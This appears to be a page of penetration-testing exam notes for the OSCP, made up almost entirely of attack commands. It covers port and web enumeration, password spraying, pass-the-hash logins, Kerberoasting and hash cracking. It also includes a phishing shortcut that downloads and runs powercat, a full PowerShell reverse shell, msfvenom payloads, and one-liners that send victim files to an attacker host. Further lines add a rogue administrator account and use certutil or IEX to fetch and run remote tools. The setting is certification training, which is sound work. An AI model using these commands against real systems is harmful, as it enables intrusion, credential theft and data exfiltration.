Beginning

Capture Everything:

whoami && ipconfig && type proof.txt
whoami && ifconfig && type proof.txt

  1. Make Directories

  2. Nmap Scan -Pn

nmap -Pn ip_address

Other method:

nmap -n -v -sT -A  192.168.1.249

  1. Run nmapAutomator Script to automate enum:

/usr/local/bin/nmapAutomator.sh -H 192.168.1.1 -t All

Link: https://github.com/21y4d/nmapAutomator

Or Run Auto Recon (with Sudo Priv):

python3 -m pip install -r ../AutoRecon-main/requirements.txt --break-system-pack

Link: https://github.com/Tib3rius/AutoRecon

  1. Nmap detailed with Service Scan

We'll use -sV to enable service and version detection as well as -sC to use Nmap's default scripts. In addition, we'll enter -oN to create an output file containing the scan results.

sudo nmap -sC -sV -oN nmap_results.txt 192.168.247.242

  1. If Http service found, run GoBuster Basics

gobuster dir -u http://192.168.247.242 -w /usr/share/wordlists/dirb/common.txt -o gobuster_results -x txt,pdf,config

Others:

gobuster dir -u http://192.168.214.249:8000/  -w /usr/share/wordlists/dirb/common.txt -q -n -e

gobuster dir -u http://192.168.214.249:8000/cms/  -w /usr/share/wordlists/dirb/common.txt -q -n -e -b 302

Or use this:

python3 dirsearch.py -u http://example.com -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
directory-list-2.3-medium.txt
directory-list-2.3-big.txt

  1. If you have version of service (or even if not), use exploitdb or searchsploit to know if there are exploits available.

searchsploit hmailserver

  1. If Wordpress, use:

whatweb http://192.168.247.244

  1. Get Wordpress Plugins details:

wpscan --url http://192.168.247.244 --enumerate p --plugins-detection aggressive -o wpscan_results.txt

  1. Once you file any creds, or useful information, add them to the list of things and keep going!

  2. Trying different usernames & passwords using crackmap

crackmapexec smb 192.168.247.242 -u usernames.txt -p passwords.txt --continue-on-success

Then check permissions:

crackmapexec smb 192.168.247.242 -u john -p "dqsXxXpZPn#nL" --shares

Login with local creds:

crackmapexec smb 192.168.173.96 -u administrator -p 'HULULaasd.?' --shares --local-auth

Phishing:

wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/Downloads/lab/webdav

the victim will look at lnk file in home directory of webdav

create a shortcut file with below command:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.154:8000/powercat.ps1'); powercat -c 192.168.45.154 -p 4444 -e powershell"

And put this content on config.Library-ms:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://192.168.45.154</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Few more helpful stuff

cp /usr/share/peass/linpeas/linpeas.sh .
python3 -m http.server 80
sudo killall -9 python3
wget -O shell.sh http://192.168.45.154/linpeas.sh
git log

Git Commands:

Using git_dumper download whole .git folder

git show 612ff5783dd5dbd1x0x008523dba83374a84aaf1
git commit 612ff5783dd5dbd1x0x008523dba83374a84aaf1

git checkout 612ff5783dd5dbd1x0x008523dba83374a84aaf1

Powershell reverse shell

powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.45.173',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String );$sendback2=$sendback + 'PS ' + (pwd).Path + '> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Search for sensitive extensions:

dir /s /b /ah *.zip
Get-ChildItem -Path . -Recurse -Filter "proof.txt" -ErrorAction SilentlyContinue
Get-ChildItem -Path . -Recurse -Filter "local.txt" -ErrorAction SilentlyContinue

Before you do anything else, run:

whoami /priv

Move to a different user

meterpreter > execute -H -f cmd.exe -u "targetusername" -p "Password123"

Transferring Files

Download into windows victim:

iwr -uri http://192.168.45.154:8000/SharpHound.ps1 -Outfile SharpHound.ps1
iwr -uri http://192.168.45.166/winPEASx64.exe -Outfile wpeas.exe
iwr -uri http://192.168.45.166/pspoof.exe -Outfile pspoof.exe
iwr -uri http://192.168.45.166/nc.exe -Outfile nc.exe
iwr -uri http://192.168.45.166/mimi.exe -Outfile mimi.exe
iwr -uri http://192.168.45.166/shell.exe -Outfile shell.exe
certutil.exe -urlcache -split -f http://192.168.45.166/shell.exe c:\users\public\shell.exe
proxychains -q /usr/share/doc/python3-impacket/examples/impacket-GetUserSPNs -request -dc-ip 192.168.50.70 oscp.exam
iwr -uri http://192.168.45.166/Rubeus.exe -Outfile rub.exe
.\rub.exe kerberoast /outfile:hashes.kerberoast

On kali:

nc -nlvp 9001 > received_file.txt

On Victim (Windows):

Note: Ensure you give exact full path

$client = New-Object System.Net.Sockets.TCPClient("<kali_ip>",9001);$stream = $client.GetStream();[byte[]]$bytes = [System.IO.File]::ReadAllBytes("C:\Path\To\File.txt");$stream.Write($bytes,0,$bytes.Length);$stream.Close();$client.Close()

On Victim (Linux):

nc <kali_ip> 9001 < /path/to/file.txt

Reverse Shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.210 LPORT=443 -f exe -o 2shell.exe

Then get meterpreter to catch the session:

nc -lvnp 443

Or using Meterpreter (not allowed in OSCP)

sudo msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.45.221
set LPORT 443
set ExitOnSession false
run -j

Then setup SOCKS Proxy:

use multi/manage/autoroute
set session 1
run
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set VERSION 5
run -j

Ensure you edit /etc/proxychains4.conf file manually

Using nmap to scap:

sudo proxychains -q nmap -sT -oN nmap_servers -Pn -p 21,80,443 172.16.6.240 172.16.6.241 172.16.6.254

Some more commands:

proxychains -q evil-winrm -i 10.10.143.148 -u support -p "Freedom1"

proxychains -q evil-winrm -i 10.10.143.148 -u web_svc -p "Diamond1" -d oscp.exam

proxychains -q evil-winrm -i 10.10.143.148 -u Mary.Williams -H 9a3121977ee93af56ebd0ef4f527a35e

proxychains -q evil-winrm -i 10.10.143.146 -u tom_admin -H 4979d69d4ca66955c075c41cf45f24dc
proxychains -q /usr/share/doc/python3-impacket/examples/psexec.py MS02/[email protected]

proxychains -q /usr/share/doc/python3-impacket/examples/psexec.py web_svc:[email protected]

proxychains -q /usr/share/doc/python3-impacket/examples/psexec.py OSCP.exam/[email protected] -hashes 00000000000000000000000000000000:9a3121977ee93af56ebd0ef4f527a35e

proxychains -q /usr/share/doc/python3-impacket/examples/psexec.py [email protected] -hashes 00000000000000000000000000000000:9a3121977ee93af56ebd0ef4f527a35e
proxychains -q /usr/share/doc/python3-impacket/examples/mssqlclient.py oscp.exam/web_svc:[email protected] -windows-auth
proxychains -q crackmapexec smb 10.10.143.148 -u users.txt -d oscp.exam -p password.txt --shares

proxychains -q crackmapexec smb 10.10.143.148 -u users.txt -d oscp.exam -p password.txt --continue-on-success

Get Windows System Info:

Get-ComputerInfo | Select-Object WindowsProductName, WindowsVersion, OsArchitecture, WindowsBuildLabEx

Enable RDP Service

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
sc query termservice

Create new User and Add to Admin group:

net user hacker password /add
net localgroup Administrators hacker /add

Using Potatos

.\pspoof.exe -c "nc.exe 192.168.45.166 1337 -e cmd"
.\sp.exe "net user hacker password /add"

Connect to RDP:

xfreerdp /v:192.168.183.147 /u:hacker /p:password /drive:kali,/home/kali/shared

PowerUP

certutil.exe -urlcache -split -f "http://192.168.45.164/PowerUp.ps1"
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
powershell -exec bypass -Command "Import-Module .\PowerUp.ps1;Invoke-AllChecks"

Jaws Powershell PrivEsc Windows:

https://github.com/411Hall/JAWS/blob/master/jaws-enum.ps1
https://github.com/411Hall/JAWS
powershell IEX (New-Object Net.WebClient).downloadString('https://192.168.49.221/Jaws.ps1')
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename EnumOutput.txt

Enable SSH Service in Kali:

start the SSH service:

sudo systemctl enable ssh
sudo systemctl start ssh

Check if it’s running:

sudo systemctl status ssh

Then do a reverse tunnel back to kali:

ssh -N -R 1122 [email protected]

Switching to Root user if you have SU rights:

Install Python package systemwide;

python3 -m pip install -r requirements.txt --break-system-packages

Cracking NTLM Hashes:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT ntlm.hashes

//incase the cache dont show up
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT --pot=new.pot ntlm.hashes

RunAs Command:

runas /user:OSCP\eric.wallows cmd.exe

Quick Sharphound:

iwr -uri http://192.168.45.166/SharpHound.ps1 -Outfile sh.ps1
powershell -ep bypass

Import-Module .\Sharphound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory c:\users\public\ -OutputPrefix "corp audit" -ZipPassword MyPassword
./home/kali/Downloads/BloodHound-linux-x64/BloodHound --no-sandbox

Windows Quick Checks

strings admintool.exe | grep password
Get-ChildItem -Path "C:\Users\" -Recurse -Force -Filter "ConsoleHost_history.txt" -ErrorAction SilentlyContinue

PreviousNetScan PortscanNextSMB Enumeration (Port 139, 445)

Last updated